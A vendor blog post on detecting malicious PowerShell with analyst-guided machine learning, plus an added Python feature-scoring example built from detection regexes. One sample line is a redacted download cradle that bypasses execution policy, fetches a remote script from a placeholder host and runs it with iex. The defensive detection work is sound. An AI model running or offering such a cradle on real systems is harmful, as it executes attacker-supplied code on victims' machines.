Hunting for Suspicious PowerShell: The Anvilogic Way

PowerShell is a powerful scripting language. Admins love it because they can load arbitrary code or access resources. On the other hand, attackers love it for the same reasons. It’s extremely effective for living off the land (LotL) and avoiding typical detection methods within endpoint or XDR solutions. 

The challenge of building a PowerShell detection is a “non-empty intersection” between how attackers use PowerShell scripts versus how admins use them. We see the usage of functions like iex, New-Object and WebClient in both administrative and malicious scripts. Thankfully, malicious script detection is possible because the behavioral patterns for each are different. We can use these differences to our advantage when helping customers detect this type of attack. 

Anvilogic has a different approach to detecting advanced threats like suspicious PowerShell: Advanced Threat Detection (ATD). Our approach to ATD provides you with a hunting co-pilot — automating the human approach of hypothesis-driven hunting while leveraging machine learning (ML). The way we approach this is three-fold:

  1. The Armory: A growing collection of over 1,000 ready-to-deploy detection rules, trending topics, and threat research and intelligence from our purple team of researchers and hunters with over 60 years of cumulative experience.
  2. Anvilogic Hunting Framework: Provides a hunting co-pilot that escalates suspicious activity, sends significant alerts to triage for investigation, and enriches data to find and remove false positives or unwanted alerts.
  3. Targeted ML: Threat hunter-trained ML finds suspicious patterns inside Events of Interest (or high-fidelity alerts) instead of your raw data, so you don’t miss threats in plain sight.

So why utilize Anvilogic’s ATD? Why not just build your own detection?

A unique aspect of our approach to ATD is that we use our entire customer base to tune our ML models. You can think of our broad customer base as your peer group. With a large peer group across different industries and company sizes, you benefit from those real-world insights while helping us build a better ML model in the process. As a result, ATD significantly uplifts what an in-house group of analysts, engineers, and data scientists could do on their own with their SOC resources. You could, of course, do this all yourself — collect external resources, create datasets, and continuously curate and update ML models — but why would you when you have a plethora of other things you need to do? 

By observing legitimate behavior across a large and diverse customer base that uses PowerShell to accomplish tasks, we can differentiate between admin-initiated tasks and attacker-led actions and then deliver those insights directly to you. 

How are we building more effective ML models?

It is common practice when building ML models to let your deep learning models perform the “feature engineering,” that is, to determine which signals in the data are interesting enough to base a decision on. This works well when you have lots of data representing all potential inputs (e.g., ChatGPT was trained on an extremely large dataset from the Internet). Unfortunately, in cybersecurity, we generally lack datasets of that size. We’ve also observed that ML models without any guidance may pick features that work well in the training set but perform extremely poorly when the model encounters new data. 

Therefore, we built this model with our purple team of researchers, hunters, and experts (The Forge) to identify features in PowerShell that analysts would focus on to determine if the script is malicious. We also source training sets from the Forge team to provide the model with high-quality examples of malicious data. Below is a malicious script from our dataset provided by our Forge team:

Note that we have replaced some variable parts with XXX. The features we chose for the model draw attention to the key aspects of this malicious script: a download of code from the internet that is then executed by iex. The execution policy of bypass enables the malicious code to run unblocked. Therefore, by leveraging our team’s hands-on-keyboard hunt experience, threat research, and expertise in building deep learning models, we can deploy effective ML models on your behalf — saving you the time and effort of rolling out your own.
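As an added example (not Anvilogic's code or model), the following Python extracts the analyst-chosen features named above from PowerShell command lines and combines them with illustrative weights; the command lines, the weights and the intranet.example host are constructed for illustration.

```python
"""Analyst-chosen features for PowerShell command lines. Added example, not
Anvilogic's code or model: it extracts the signals the post names (download
from the internet, execution by iex, execution policy bypass) explicitly."""
import re

# Case-insensitive regexes, one per feature. The bare tokens (iex, New-Object,
# WebClient) appear in admin scripts too, so no single one decides on its own.
FEATURE_PATTERNS = {
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "new_object": re.compile(r"\bnew-object\b", re.I),
    "webclient": re.compile(r"\bwebclient\b", re.I),
    "download_method": re.compile(r"\.download(string|file|data)\s*\(", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "exec_policy_bypass": re.compile(r"-(ep|ex\w*)\s+bypass\b", re.I),
}

# Illustrative analyst weights: "fetched from the internet and handed to iex"
# as one event carries far more signal than any single token.
WEIGHTS = {
    "invoke_expression": 1, "new_object": 0, "webclient": 1,
    "download_method": 1, "remote_url": 1, "exec_policy_bypass": 2,
    "download_then_execute": 4,
}

def extract_features(cmdline: str) -> dict:
    """Return a 0/1 feature vector for one command line."""
    feats = {name: int(bool(pat.search(cmdline)))
             for name, pat in FEATURE_PATTERNS.items()}
    # Derived feature: a remote download and an inline execution together.
    feats["download_then_execute"] = int(feats["download_method"]
        and feats["remote_url"] and feats["invoke_expression"])
    return feats

def score(cmdline: str) -> int:
    """Weighted sum of the feature vector; a stand-in for the model's output."""
    return sum(WEIGHTS[n] * v for n, v in extract_features(cmdline).items())

# Constructed samples: two admin command lines and one redacted download cradle.
SAMPLES = {
    "admin_download_only": "powershell.exe -Command \"(New-Object Net.WebClient)"
        ".DownloadFile('https://intranet.example/agent.msi','C:\\Temp\\agent.msi')\"",
    "admin_bypass_local_file":
        "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\rotate-logs.ps1",
    "cradle_redacted": "powershell.exe -ExecutionPolicy Bypass -Command "
        "\"iex (New-Object Net.WebClient).DownloadString('https://XXX/stage.ps1')\"",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:24s} score={score(cmd):2d} {extract_features(cmd)}")
```

The admin download line shares New-Object and WebClient with the cradle yet scores low, because only the conjunction of download, remote URL and iex fires the heavily weighted derived feature.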

Anvilogic’s ATD bolsters your hunting resources and provides insights that help you easily piece together the story of an incident. By leveraging ML-driven analytics and our purple team of researchers, hunters, data scientists, and product leaders with over 60 years of collective experience, you benefit from the additional coverage and insights Anvilogic provides. 

For more information about the benefits of ATD, check out our data sheet or schedule a time to talk to one of our experts.

Wishing you better hunts in 2023,

Alexa Araneta & Mike Hart
